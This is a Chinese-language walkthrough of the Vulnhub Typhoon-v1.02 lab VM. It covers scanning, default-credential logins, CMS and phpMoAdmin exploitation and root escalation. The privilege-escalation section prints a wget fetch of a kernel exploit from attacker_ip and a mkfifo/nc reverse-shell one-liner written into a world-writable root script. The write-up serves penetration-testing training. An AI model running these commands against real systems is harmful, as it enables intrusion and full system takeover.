Vulnhub Typhoon-v1.02
字数 2248 2025-08-27 12:33:37
Typhoon-v1.02 靶机渗透测试教学文档
1. 靶机概述
Typhoon-v1.02 是一个来自 Vulnhub 的渗透测试靶机,难度相对简单,提供了多种渗透路径和提权方式。该靶机运行在 Ubuntu 14.04.1 LTS 系统上,内核版本为 3.13.0-32-generic。
2. 环境准备
2.1 靶机下载
- 直接下载: Google Drive
- Torrent下载: Typhoon-v1.02.ova.torrent
2.2 网络配置
确保攻击机和靶机在同一网络段,使用ARP扫描发现靶机IP。
3. 信息收集
3.1 主机发现
arp-scan -l
发现靶机IP为192.168.2.149
3.2 端口扫描
nmap -A 192.168.2.149
扫描结果摘要:
| 端口 | 服务 | 版本信息 |
|---|---|---|
| 21/tcp | ftp | vsftpd 3.0.2 (允许匿名登录) |
| 22/tcp | ssh | OpenSSH 6.6.1p1 Ubuntu |
| 25/tcp | smtp | Postfix |
| 53/tcp | domain | ISC BIND 9.9.5-3 |
| 80/tcp | http | Apache 2.4.7 (Ubuntu) |
| 110/tcp | pop3 | Dovecot pop3d |
| 111/tcp | rpcbind | 2-4 |
| 139/tcp | netbios-ssn | Samba smbd 3.X-4.X |
| 143/tcp | imap | Dovecot imapd |
| 445/tcp | netbios-ssn | Samba smbd 4.1.6-Ubuntu |
| 631/tcp | ipp | CUPS 1.7 |
| 993/tcp | ssl/imap | Dovecot imapd |
| 995/tcp | ssl/pop3 | Dovecot pop3d |
| 2049/tcp | nfs_acl | 2-3 |
| 3306/tcp | mysql | MySQL (未授权) |
| 5432/tcp | postgresql | PostgreSQL DB 9.3.3-9.3.5 |
| 8080/tcp | http | Apache Tomcat/Coyote JSP engine 1.1 |
3.3 Web目录扫描
dirb http://192.168.2.149
发现以下重要目录:
- /assets/
- /calendar/
- /cgi-bin/ (403)
- /cms/
- /drupal/
- /javascript/
- /phpmyadmin/
- /robots.txt
4. 渗透路径
4.1 MongoDB WebUI (phpMoAdmin) 漏洞利用
-
访问
/robots.txt发现/mongoadmin/目录 -
查看版本信息:
http://192.168.2.149/mongoadmin/index.php?action=getStats版本信息:
- mongo: 3.0.15
- mongoPhpDriver: 1.6.16
- phpMoAdmin: 1.0.9
- php: 5.5.9-1ubuntu4.26
-
利用phpMoAdmin 1.0.9的RCE漏洞获取shell
4.2 SSH登录
- 在MongoDB的credentials表中发现账号密码
- 尝试SSH登录:
密码为从数据库获取的密码ssh typhoon@192.168.2.149 - 登录成功,但typhoon用户无sudo权限
4.3 Tomcat Manager
- 访问8080端口的Tomcat Manager
- 使用默认凭证tomcat/tomcat登录
- 上传war文件获取shell
4.4 CMS漏洞利用
-
Drupal CMS (http://192.168.2.149/drupal/)
- 使用Metasploit的Drupal模块获取shell
-
Lotus CMS (http://192.168.2.149/cms/)
- 使用Metasploit的LotusCMS模块获取shell
4.5 DVWA和XVWA
-
DVWA (http://192.168.2.149/dvwa/)
- 默认凭证:admin/password
- 通过命令注入获取shell
-
XVWA (http://192.168.2.149/xvwa/)
- 默认凭证:admin/admin
- 通过命令注入获取shell
4.6 phpMyAdmin
- 访问/phpmyadmin/
- 使用默认凭证root/toor登录
- 通过日志文件包含获取shell
5. 提权方法
5.1 内核漏洞提权
-
查看系统信息:
uname -a lsb_release -a输出:
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux Ubuntu 14.04.1 LTS -
搜索相关exploit:
searchsploit linux 3.13.0发现overlayfs本地提权漏洞(37292.c)
-
下载并编译exploit:
wget http://attacker_ip/37292.c gcc 37292.c -o exploit chmod a+x exploit ./exploit -
成功获取root权限
5.2 可写文件提权
-
发现/tab/script.sh文件权限为777:
ls -al /tab/输出:
-rwxrwxrwx 1 root root 71 Dec 17 16:48 script.sh -
写入反弹shell命令:
echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip 8888 >/tmp/f" > /tab/script.sh -
在攻击机监听:
nc -lvvp 8888 -
执行script.sh获取root shell
6. 获取Flag
成功提权后,查看root目录下的flag文件:
cat /root/root-flag
输出:
<Congrats!>Typhoon_r00t3r!</Congrats!>
7. 总结
Typhoon-v1.02靶机提供了多种渗透路径和提权方法,主要学习点包括:
- phpMoAdmin的RCE漏洞利用
- 通过数据库泄露凭证进行SSH登录
- 多种CMS的漏洞利用
- 内核漏洞提权(overlayfs)
- 可写文件提权技术
该靶机适合初学者练习信息收集、漏洞利用和权限提升的基本技能。